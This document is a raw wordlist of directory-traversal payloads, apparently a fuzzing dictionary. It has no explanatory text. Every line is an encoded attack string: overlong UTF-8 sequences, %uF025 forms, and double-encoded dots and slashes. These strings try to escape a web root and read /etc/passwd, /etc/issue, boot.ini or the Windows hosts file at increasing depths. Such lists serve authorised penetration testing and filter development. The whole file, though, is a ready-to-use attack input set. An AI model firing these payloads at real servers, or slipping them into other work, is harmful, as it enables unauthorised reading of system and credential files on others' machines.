-%c0.%c0.%uF025%c0.%c0.%uF025%c0.%c0.%uF025%c0.%c0.%uF025etc%uF025issue -%c0.%c0.%uF025%c0.%c0.%uF025%c0.%c0.%uF025%c0.%c0.%uF025boot.ini -%c0.%c0.%uF025%c0.%c0.%uF025%c0.%c0.%uF025%c0.%c0.%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%c0.%c0.%uF025%c0.%c0.%uF025%c0.%c0.%uF025%c0.%c0.%uF025%c0.%c0.%uF025etc%uF025passwd -%c0.%c0.%uF025%c0.%c0.%uF025%c0.%c0.%uF025%c0.%c0.%uF025%c0.%c0.%uF025etc%uF025issue -%c0.%c0.%uF025%c0.%c0.%uF025%c0.%c0.%uF025%c0.%c0.%uF025%c0.%c0.%uF025boot.ini -%c0.%c0.%uF025%c0.%c0.%uF025%c0.%c0.%uF025%c0.%c0.%uF025%c0.%c0.%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%c0.%c0.%uF025%c0.%c0.%uF025%c0.%c0.%uF025%c0.%c0.%uF025%c0.%c0.%uF025%c0.%c0.%uF025etc%uF025passwd -%c0.%c0.%uF025%c0.%c0.%uF025%c0.%c0.%uF025%c0.%c0.%uF025%c0.%c0.%uF025%c0.%c0.%uF025etc%uF025issue -%c0.%c0.%uF025%c0.%c0.%uF025%c0.%c0.%uF025%c0.%c0.%uF025%c0.%c0.%uF025%c0.%c0.%uF025boot.ini -%c0.%c0.%uF025%c0.%c0.%uF025%c0.%c0.%uF025%c0.%c0.%uF025%c0.%c0.%uF025%c0.%c0.%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%c0.%c0.%%32%%66etc%%32%%66passwd -%c0.%c0.%%32%%66etc%%32%%66issue -%c0.%c0.%%32%%66boot.ini -%c0.%c0.%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%c0.%c0.%%32%%66%c0.%c0.%%32%%66etc%%32%%66passwd -%c0.%c0.%%32%%66%c0.%c0.%%32%%66etc%%32%%66issue -%c0.%c0.%%32%%66%c0.%c0.%%32%%66boot.ini -%c0.%c0.%%32%%66%c0.%c0.%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%c0.%c0.%%32%%66%c0.%c0.%%32%%66%c0.%c0.%%32%%66etc%%32%%66passwd -%c0.%c0.%%32%%66%c0.%c0.%%32%%66%c0.%c0.%%32%%66etc%%32%%66issue -%c0.%c0.%%32%%66%c0.%c0.%%32%%66%c0.%c0.%%32%%66boot.ini -%c0.%c0.%%32%%66%c0.%c0.%%32%%66%c0.%c0.%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%c0.%c0.%%32%%66%c0.%c0.%%32%%66%c0.%c0.%%32%%66%c0.%c0.%%32%%66etc%%32%%66passwd -%c0.%c0.%%32%%66%c0.%c0.%%32%%66%c0.%c0.%%32%%66%c0.%c0.%%32%%66etc%%32%%66issue -%c0.%c0.%%32%%66%c0.%c0.%%32%%66%c0.%c0.%%32%%66%c0.%c0.%%32%%66boot.ini -%c0.%c0.%%32%%66%c0.%c0.%%32%%66%c0.%c0.%%32%%66%c0.%c0.%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%c0.%c0.%%32%%66%c0.%c0.%%32%%66%c0.%c0.%%32%%66%c0.%c0.%%32%%66%c0.%c0.%%32%%66etc%%32%%66passwd -%c0.%c0.%%32%%66%c0.%c0.%%32%%66%c0.%c0.%%32%%66%c0.%c0.%%32%%66%c0.%c0.%%32%%66etc%%32%%66issue -%c0.%c0.%%32%%66%c0.%c0.%%32%%66%c0.%c0.%%32%%66%c0.%c0.%%32%%66%c0.%c0.%%32%%66boot.ini -%c0.%c0.%%32%%66%c0.%c0.%%32%%66%c0.%c0.%%32%%66%c0.%c0.%%32%%66%c0.%c0.%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%c0.%c0.%%32%%66%c0.%c0.%%32%%66%c0.%c0.%%32%%66%c0.%c0.%%32%%66%c0.%c0.%%32%%66%c0.%c0.%%32%%66etc%%32%%66passwd -%c0.%c0.%%32%%66%c0.%c0.%%32%%66%c0.%c0.%%32%%66%c0.%c0.%%32%%66%c0.%c0.%%32%%66%c0.%c0.%%32%%66etc%%32%%66issue -%c0.%c0.%%32%%66%c0.%c0.%%32%%66%c0.%c0.%%32%%66%c0.%c0.%%32%%66%c0.%c0.%%32%%66%c0.%c0.%%32%%66boot.ini -%c0.%c0.%%32%%66%c0.%c0.%%32%%66%c0.%c0.%%32%%66%c0.%c0.%%32%%66%c0.%c0.%%32%%66%c0.%c0.%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%c0.%c0.%%35%%63etc%%35%%63passwd -%c0.%c0.%%35%%63etc%%35%%63issue -%c0.%c0.%%35%%63boot.ini -%c0.%c0.%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%c0.%c0.%%35%%63%c0.%c0.%%35%%63etc%%35%%63passwd -%c0.%c0.%%35%%63%c0.%c0.%%35%%63etc%%35%%63issue -%c0.%c0.%%35%%63%c0.%c0.%%35%%63boot.ini -%c0.%c0.%%35%%63%c0.%c0.%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%c0.%c0.%%35%%63%c0.%c0.%%35%%63%c0.%c0.%%35%%63etc%%35%%63passwd -%c0.%c0.%%35%%63%c0.%c0.%%35%%63%c0.%c0.%%35%%63etc%%35%%63issue -%c0.%c0.%%35%%63%c0.%c0.%%35%%63%c0.%c0.%%35%%63boot.ini -%c0.%c0.%%35%%63%c0.%c0.%%35%%63%c0.%c0.%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%c0.%c0.%%35%%63%c0.%c0.%%35%%63%c0.%c0.%%35%%63%c0.%c0.%%35%%63etc%%35%%63passwd -%c0.%c0.%%35%%63%c0.%c0.%%35%%63%c0.%c0.%%35%%63%c0.%c0.%%35%%63etc%%35%%63issue -%c0.%c0.%%35%%63%c0.%c0.%%35%%63%c0.%c0.%%35%%63%c0.%c0.%%35%%63boot.ini -%c0.%c0.%%35%%63%c0.%c0.%%35%%63%c0.%c0.%%35%%63%c0.%c0.%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%c0.%c0.%%35%%63%c0.%c0.%%35%%63%c0.%c0.%%35%%63%c0.%c0.%%35%%63%c0.%c0.%%35%%63etc%%35%%63passwd -%c0.%c0.%%35%%63%c0.%c0.%%35%%63%c0.%c0.%%35%%63%c0.%c0.%%35%%63%c0.%c0.%%35%%63etc%%35%%63issue -%c0.%c0.%%35%%63%c0.%c0.%%35%%63%c0.%c0.%%35%%63%c0.%c0.%%35%%63%c0.%c0.%%35%%63boot.ini -%c0.%c0.%%35%%63%c0.%c0.%%35%%63%c0.%c0.%%35%%63%c0.%c0.%%35%%63%c0.%c0.%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%c0.%c0.%%35%%63%c0.%c0.%%35%%63%c0.%c0.%%35%%63%c0.%c0.%%35%%63%c0.%c0.%%35%%63%c0.%c0.%%35%%63etc%%35%%63passwd -%c0.%c0.%%35%%63%c0.%c0.%%35%%63%c0.%c0.%%35%%63%c0.%c0.%%35%%63%c0.%c0.%%35%%63%c0.%c0.%%35%%63etc%%35%%63issue -%c0.%c0.%%35%%63%c0.%c0.%%35%%63%c0.%c0.%%35%%63%c0.%c0.%%35%%63%c0.%c0.%%35%%63%c0.%c0.%%35%%63boot.ini -%c0.%c0.%%35%%63%c0.%c0.%%35%%63%c0.%c0.%%35%%63%c0.%c0.%%35%%63%c0.%c0.%%35%%63%c0.%c0.%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%c0.%c0.%e0%80%afetc%e0%80%afpasswd -%c0.%c0.%e0%80%afetc%e0%80%afissue -%c0.%c0.%e0%80%afboot.ini -%c0.%c0.%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%c0.%c0.%e0%80%af%c0.%c0.%e0%80%afetc%e0%80%afpasswd -%c0.%c0.%e0%80%af%c0.%c0.%e0%80%afetc%e0%80%afissue -%c0.%c0.%e0%80%af%c0.%c0.%e0%80%afboot.ini -%c0.%c0.%e0%80%af%c0.%c0.%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%c0.%c0.%e0%80%af%c0.%c0.%e0%80%af%c0.%c0.%e0%80%afetc%e0%80%afpasswd -%c0.%c0.%e0%80%af%c0.%c0.%e0%80%af%c0.%c0.%e0%80%afetc%e0%80%afissue -%c0.%c0.%e0%80%af%c0.%c0.%e0%80%af%c0.%c0.%e0%80%afboot.ini -%c0.%c0.%e0%80%af%c0.%c0.%e0%80%af%c0.%c0.%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%c0.%c0.%e0%80%af%c0.%c0.%e0%80%af%c0.%c0.%e0%80%af%c0.%c0.%e0%80%afetc%e0%80%afpasswd -%c0.%c0.%e0%80%af%c0.%c0.%e0%80%af%c0.%c0.%e0%80%af%c0.%c0.%e0%80%afetc%e0%80%afissue -%c0.%c0.%e0%80%af%c0.%c0.%e0%80%af%c0.%c0.%e0%80%af%c0.%c0.%e0%80%afboot.ini -%c0.%c0.%e0%80%af%c0.%c0.%e0%80%af%c0.%c0.%e0%80%af%c0.%c0.%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%c0.%c0.%e0%80%af%c0.%c0.%e0%80%af%c0.%c0.%e0%80%af%c0.%c0.%e0%80%af%c0.%c0.%e0%80%afetc%e0%80%afpasswd -%c0.%c0.%e0%80%af%c0.%c0.%e0%80%af%c0.%c0.%e0%80%af%c0.%c0.%e0%80%af%c0.%c0.%e0%80%afetc%e0%80%afissue -%c0.%c0.%e0%80%af%c0.%c0.%e0%80%af%c0.%c0.%e0%80%af%c0.%c0.%e0%80%af%c0.%c0.%e0%80%afboot.ini -%c0.%c0.%e0%80%af%c0.%c0.%e0%80%af%c0.%c0.%e0%80%af%c0.%c0.%e0%80%af%c0.%c0.%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%c0.%c0.%e0%80%af%c0.%c0.%e0%80%af%c0.%c0.%e0%80%af%c0.%c0.%e0%80%af%c0.%c0.%e0%80%af%c0.%c0.%e0%80%afetc%e0%80%afpasswd -%c0.%c0.%e0%80%af%c0.%c0.%e0%80%af%c0.%c0.%e0%80%af%c0.%c0.%e0%80%af%c0.%c0.%e0%80%af%c0.%c0.%e0%80%afetc%e0%80%afissue -%c0.%c0.%e0%80%af%c0.%c0.%e0%80%af%c0.%c0.%e0%80%af%c0.%c0.%e0%80%af%c0.%c0.%e0%80%af%c0.%c0.%e0%80%afboot.ini -%c0.%c0.%e0%80%af%c0.%c0.%e0%80%af%c0.%c0.%e0%80%af%c0.%c0.%e0%80%af%c0.%c0.%e0%80%af%c0.%c0.%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%c0.%c0.%25c1%259cetc%25c1%259cpasswd -%c0.%c0.%25c1%259cetc%25c1%259cissue -%c0.%c0.%25c1%259cboot.ini -%c0.%c0.%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%c0.%c0.%25c1%259c%c0.%c0.%25c1%259cetc%25c1%259cpasswd -%c0.%c0.%25c1%259c%c0.%c0.%25c1%259cetc%25c1%259cissue -%c0.%c0.%25c1%259c%c0.%c0.%25c1%259cboot.ini -%c0.%c0.%25c1%259c%c0.%c0.%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%c0.%c0.%25c1%259c%c0.%c0.%25c1%259c%c0.%c0.%25c1%259cetc%25c1%259cpasswd -%c0.%c0.%25c1%259c%c0.%c0.%25c1%259c%c0.%c0.%25c1%259cetc%25c1%259cissue -%c0.%c0.%25c1%259c%c0.%c0.%25c1%259c%c0.%c0.%25c1%259cboot.ini -%c0.%c0.%25c1%259c%c0.%c0.%25c1%259c%c0.%c0.%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%c0.%c0.%25c1%259c%c0.%c0.%25c1%259c%c0.%c0.%25c1%259c%c0.%c0.%25c1%259cetc%25c1%259cpasswd -%c0.%c0.%25c1%259c%c0.%c0.%25c1%259c%c0.%c0.%25c1%259c%c0.%c0.%25c1%259cetc%25c1%259cissue -%c0.%c0.%25c1%259c%c0.%c0.%25c1%259c%c0.%c0.%25c1%259c%c0.%c0.%25c1%259cboot.ini -%c0.%c0.%25c1%259c%c0.%c0.%25c1%259c%c0.%c0.%25c1%259c%c0.%c0.%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%c0.%c0.%25c1%259c%c0.%c0.%25c1%259c%c0.%c0.%25c1%259c%c0.%c0.%25c1%259c%c0.%c0.%25c1%259cetc%25c1%259cpasswd -%c0.%c0.%25c1%259c%c0.%c0.%25c1%259c%c0.%c0.%25c1%259c%c0.%c0.%25c1%259c%c0.%c0.%25c1%259cetc%25c1%259cissue -%c0.%c0.%25c1%259c%c0.%c0.%25c1%259c%c0.%c0.%25c1%259c%c0.%c0.%25c1%259c%c0.%c0.%25c1%259cboot.ini -%c0.%c0.%25c1%259c%c0.%c0.%25c1%259c%c0.%c0.%25c1%259c%c0.%c0.%25c1%259c%c0.%c0.%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%c0.%c0.%25c1%259c%c0.%c0.%25c1%259c%c0.%c0.%25c1%259c%c0.%c0.%25c1%259c%c0.%c0.%25c1%259c%c0.%c0.%25c1%259cetc%25c1%259cpasswd -%c0.%c0.%25c1%259c%c0.%c0.%25c1%259c%c0.%c0.%25c1%259c%c0.%c0.%25c1%259c%c0.%c0.%25c1%259c%c0.%c0.%25c1%259cetc%25c1%259cissue -%c0.%c0.%25c1%259c%c0.%c0.%25c1%259c%c0.%c0.%25c1%259c%c0.%c0.%25c1%259c%c0.%c0.%25c1%259c%c0.%c0.%25c1%259cboot.ini -%c0.%c0.%25c1%259c%c0.%c0.%25c1%259c%c0.%c0.%25c1%259c%c0.%c0.%25c1%259c%c0.%c0.%25c1%259c%c0.%c0.%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%c0.%c0.%25c0%25afetc%25c0%25afpasswd -%c0.%c0.%25c0%25afetc%25c0%25afissue -%c0.%c0.%25c0%25afboot.ini -%c0.%c0.%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%c0.%c0.%25c0%25af%c0.%c0.%25c0%25afetc%25c0%25afpasswd -%c0.%c0.%25c0%25af%c0.%c0.%25c0%25afetc%25c0%25afissue -%c0.%c0.%25c0%25af%c0.%c0.%25c0%25afboot.ini -%c0.%c0.%25c0%25af%c0.%c0.%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%c0.%c0.%25c0%25af%c0.%c0.%25c0%25af%c0.%c0.%25c0%25afetc%25c0%25afpasswd -%c0.%c0.%25c0%25af%c0.%c0.%25c0%25af%c0.%c0.%25c0%25afetc%25c0%25afissue -%c0.%c0.%25c0%25af%c0.%c0.%25c0%25af%c0.%c0.%25c0%25afboot.ini -%c0.%c0.%25c0%25af%c0.%c0.%25c0%25af%c0.%c0.%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%c0.%c0.%25c0%25af%c0.%c0.%25c0%25af%c0.%c0.%25c0%25af%c0.%c0.%25c0%25afetc%25c0%25afpasswd -%c0.%c0.%25c0%25af%c0.%c0.%25c0%25af%c0.%c0.%25c0%25af%c0.%c0.%25c0%25afetc%25c0%25afissue -%c0.%c0.%25c0%25af%c0.%c0.%25c0%25af%c0.%c0.%25c0%25af%c0.%c0.%25c0%25afboot.ini -%c0.%c0.%25c0%25af%c0.%c0.%25c0%25af%c0.%c0.%25c0%25af%c0.%c0.%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%c0.%c0.%25c0%25af%c0.%c0.%25c0%25af%c0.%c0.%25c0%25af%c0.%c0.%25c0%25af%c0.%c0.%25c0%25afetc%25c0%25afpasswd -%c0.%c0.%25c0%25af%c0.%c0.%25c0%25af%c0.%c0.%25c0%25af%c0.%c0.%25c0%25af%c0.%c0.%25c0%25afetc%25c0%25afissue -%c0.%c0.%25c0%25af%c0.%c0.%25c0%25af%c0.%c0.%25c0%25af%c0.%c0.%25c0%25af%c0.%c0.%25c0%25afboot.ini -%c0.%c0.%25c0%25af%c0.%c0.%25c0%25af%c0.%c0.%25c0%25af%c0.%c0.%25c0%25af%c0.%c0.%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%c0.%c0.%25c0%25af%c0.%c0.%25c0%25af%c0.%c0.%25c0%25af%c0.%c0.%25c0%25af%c0.%c0.%25c0%25af%c0.%c0.%25c0%25afetc%25c0%25afpasswd -%c0.%c0.%25c0%25af%c0.%c0.%25c0%25af%c0.%c0.%25c0%25af%c0.%c0.%25c0%25af%c0.%c0.%25c0%25af%c0.%c0.%25c0%25afetc%25c0%25afissue -%c0.%c0.%25c0%25af%c0.%c0.%25c0%25af%c0.%c0.%25c0%25af%c0.%c0.%25c0%25af%c0.%c0.%25c0%25af%c0.%c0.%25c0%25afboot.ini -%c0.%c0.%25c0%25af%c0.%c0.%25c0%25af%c0.%c0.%25c0%25af%c0.%c0.%25c0%25af%c0.%c0.%25c0%25af%c0.%c0.%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%c0.%c0.%f0%80%80%afetc%f0%80%80%afpasswd -%c0.%c0.%f0%80%80%afetc%f0%80%80%afissue -%c0.%c0.%f0%80%80%afboot.ini -%c0.%c0.%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%c0.%c0.%f0%80%80%af%c0.%c0.%f0%80%80%afetc%f0%80%80%afpasswd -%c0.%c0.%f0%80%80%af%c0.%c0.%f0%80%80%afetc%f0%80%80%afissue -%c0.%c0.%f0%80%80%af%c0.%c0.%f0%80%80%afboot.ini -%c0.%c0.%f0%80%80%af%c0.%c0.%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%c0.%c0.%f0%80%80%af%c0.%c0.%f0%80%80%af%c0.%c0.%f0%80%80%afetc%f0%80%80%afpasswd -%c0.%c0.%f0%80%80%af%c0.%c0.%f0%80%80%af%c0.%c0.%f0%80%80%afetc%f0%80%80%afissue -%c0.%c0.%f0%80%80%af%c0.%c0.%f0%80%80%af%c0.%c0.%f0%80%80%afboot.ini -%c0.%c0.%f0%80%80%af%c0.%c0.%f0%80%80%af%c0.%c0.%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%c0.%c0.%f0%80%80%af%c0.%c0.%f0%80%80%af%c0.%c0.%f0%80%80%af%c0.%c0.%f0%80%80%afetc%f0%80%80%afpasswd -%c0.%c0.%f0%80%80%af%c0.%c0.%f0%80%80%af%c0.%c0.%f0%80%80%af%c0.%c0.%f0%80%80%afetc%f0%80%80%afissue -%c0.%c0.%f0%80%80%af%c0.%c0.%f0%80%80%af%c0.%c0.%f0%80%80%af%c0.%c0.%f0%80%80%afboot.ini -%c0.%c0.%f0%80%80%af%c0.%c0.%f0%80%80%af%c0.%c0.%f0%80%80%af%c0.%c0.%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%c0.%c0.%f0%80%80%af%c0.%c0.%f0%80%80%af%c0.%c0.%f0%80%80%af%c0.%c0.%f0%80%80%af%c0.%c0.%f0%80%80%afetc%f0%80%80%afpasswd -%c0.%c0.%f0%80%80%af%c0.%c0.%f0%80%80%af%c0.%c0.%f0%80%80%af%c0.%c0.%f0%80%80%af%c0.%c0.%f0%80%80%afetc%f0%80%80%afissue -%c0.%c0.%f0%80%80%af%c0.%c0.%f0%80%80%af%c0.%c0.%f0%80%80%af%c0.%c0.%f0%80%80%af%c0.%c0.%f0%80%80%afboot.ini -%c0.%c0.%f0%80%80%af%c0.%c0.%f0%80%80%af%c0.%c0.%f0%80%80%af%c0.%c0.%f0%80%80%af%c0.%c0.%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%c0.%c0.%f0%80%80%af%c0.%c0.%f0%80%80%af%c0.%c0.%f0%80%80%af%c0.%c0.%f0%80%80%af%c0.%c0.%f0%80%80%af%c0.%c0.%f0%80%80%afetc%f0%80%80%afpasswd -%c0.%c0.%f0%80%80%af%c0.%c0.%f0%80%80%af%c0.%c0.%f0%80%80%af%c0.%c0.%f0%80%80%af%c0.%c0.%f0%80%80%af%c0.%c0.%f0%80%80%afetc%f0%80%80%afissue -%c0.%c0.%f0%80%80%af%c0.%c0.%f0%80%80%af%c0.%c0.%f0%80%80%af%c0.%c0.%f0%80%80%af%c0.%c0.%f0%80%80%af%c0.%c0.%f0%80%80%afboot.ini -%c0.%c0.%f0%80%80%af%c0.%c0.%f0%80%80%af%c0.%c0.%f0%80%80%af%c0.%c0.%f0%80%80%af%c0.%c0.%f0%80%80%af%c0.%c0.%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%c0.%c0.%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%c0.%c0.%f8%80%80%80%afetc%f8%80%80%80%afissue -%c0.%c0.%f8%80%80%80%afboot.ini -%c0.%c0.%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%c0.%c0.%f8%80%80%80%af%c0.%c0.%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%c0.%c0.%f8%80%80%80%af%c0.%c0.%f8%80%80%80%afetc%f8%80%80%80%afissue -%c0.%c0.%f8%80%80%80%af%c0.%c0.%f8%80%80%80%afboot.ini -%c0.%c0.%f8%80%80%80%af%c0.%c0.%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%c0.%c0.%f8%80%80%80%af%c0.%c0.%f8%80%80%80%af%c0.%c0.%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%c0.%c0.%f8%80%80%80%af%c0.%c0.%f8%80%80%80%af%c0.%c0.%f8%80%80%80%afetc%f8%80%80%80%afissue -%c0.%c0.%f8%80%80%80%af%c0.%c0.%f8%80%80%80%af%c0.%c0.%f8%80%80%80%afboot.ini -%c0.%c0.%f8%80%80%80%af%c0.%c0.%f8%80%80%80%af%c0.%c0.%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%c0.%c0.%f8%80%80%80%af%c0.%c0.%f8%80%80%80%af%c0.%c0.%f8%80%80%80%af%c0.%c0.%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%c0.%c0.%f8%80%80%80%af%c0.%c0.%f8%80%80%80%af%c0.%c0.%f8%80%80%80%af%c0.%c0.%f8%80%80%80%afetc%f8%80%80%80%afissue -%c0.%c0.%f8%80%80%80%af%c0.%c0.%f8%80%80%80%af%c0.%c0.%f8%80%80%80%af%c0.%c0.%f8%80%80%80%afboot.ini -%c0.%c0.%f8%80%80%80%af%c0.%c0.%f8%80%80%80%af%c0.%c0.%f8%80%80%80%af%c0.%c0.%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%c0.%c0.%f8%80%80%80%af%c0.%c0.%f8%80%80%80%af%c0.%c0.%f8%80%80%80%af%c0.%c0.%f8%80%80%80%af%c0.%c0.%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%c0.%c0.%f8%80%80%80%af%c0.%c0.%f8%80%80%80%af%c0.%c0.%f8%80%80%80%af%c0.%c0.%f8%80%80%80%af%c0.%c0.%f8%80%80%80%afetc%f8%80%80%80%afissue -%c0.%c0.%f8%80%80%80%af%c0.%c0.%f8%80%80%80%af%c0.%c0.%f8%80%80%80%af%c0.%c0.%f8%80%80%80%af%c0.%c0.%f8%80%80%80%afboot.ini -%c0.%c0.%f8%80%80%80%af%c0.%c0.%f8%80%80%80%af%c0.%c0.%f8%80%80%80%af%c0.%c0.%f8%80%80%80%af%c0.%c0.%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%c0.%c0.%f8%80%80%80%af%c0.%c0.%f8%80%80%80%af%c0.%c0.%f8%80%80%80%af%c0.%c0.%f8%80%80%80%af%c0.%c0.%f8%80%80%80%af%c0.%c0.%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%c0.%c0.%f8%80%80%80%af%c0.%c0.%f8%80%80%80%af%c0.%c0.%f8%80%80%80%af%c0.%c0.%f8%80%80%80%af%c0.%c0.%f8%80%80%80%af%c0.%c0.%f8%80%80%80%afetc%f8%80%80%80%afissue -%c0.%c0.%f8%80%80%80%af%c0.%c0.%f8%80%80%80%af%c0.%c0.%f8%80%80%80%af%c0.%c0.%f8%80%80%80%af%c0.%c0.%f8%80%80%80%af%c0.%c0.%f8%80%80%80%afboot.ini -%c0.%c0.%f8%80%80%80%af%c0.%c0.%f8%80%80%80%af%c0.%c0.%f8%80%80%80%af%c0.%c0.%f8%80%80%80%af%c0.%c0.%f8%80%80%80%af%c0.%c0.%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%252e%252e/etc/passwd -%252e%252e/etc/issue -%252e%252e/boot.ini -%252e%252e/windows/system32/drivers/etc/hosts -%252e%252e/%252e%252e/etc/passwd -%252e%252e/%252e%252e/etc/issue -%252e%252e/%252e%252e/boot.ini -%252e%252e/%252e%252e/windows/system32/drivers/etc/hosts -%252e%252e/%252e%252e/%252e%252e/etc/passwd -%252e%252e/%252e%252e/%252e%252e/etc/issue -%252e%252e/%252e%252e/%252e%252e/boot.ini -%252e%252e/%252e%252e/%252e%252e/windows/system32/drivers/etc/hosts -%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd -%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/issue -%252e%252e/%252e%252e/%252e%252e/%252e%252e/boot.ini -%252e%252e/%252e%252e/%252e%252e/%252e%252e/windows/system32/drivers/etc/hosts -%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd -%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/issue -%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/boot.ini -%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/windows/system32/drivers/etc/hosts -%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd -%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/issue -%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/boot.ini -%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/windows/system32/drivers/etc/hosts -%252e%252e\etc\passwd -%252e%252e\etc\issue -%252e%252e\boot.ini -%252e%252e\windows\system32\drivers\etc\hosts -%252e%252e\%252e%252e\etc\passwd -%252e%252e\%252e%252e\etc\issue -%252e%252e\%252e%252e\boot.ini -%252e%252e\%252e%252e\windows\system32\drivers\etc\hosts -%252e%252e\%252e%252e\%252e%252e\etc\passwd -%252e%252e\%252e%252e\%252e%252e\etc\issue -%252e%252e\%252e%252e\%252e%252e\boot.ini -%252e%252e\%252e%252e\%252e%252e\windows\system32\drivers\etc\hosts -%252e%252e\%252e%252e\%252e%252e\%252e%252e\etc\passwd -%252e%252e\%252e%252e\%252e%252e\%252e%252e\etc\issue -%252e%252e\%252e%252e\%252e%252e\%252e%252e\boot.ini -%252e%252e\%252e%252e\%252e%252e\%252e%252e\windows\system32\drivers\etc\hosts -%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\etc\passwd -%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\etc\issue -%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\boot.ini -%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\windows\system32\drivers\etc\hosts -%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\etc\passwd -%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\etc\issue -%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\boot.ini -%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\windows\system32\drivers\etc\hosts -%252e%252e%2fetc%2fpasswd -%252e%252e%2fetc%2fissue -%252e%252e%2fboot.ini -%252e%252e%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts 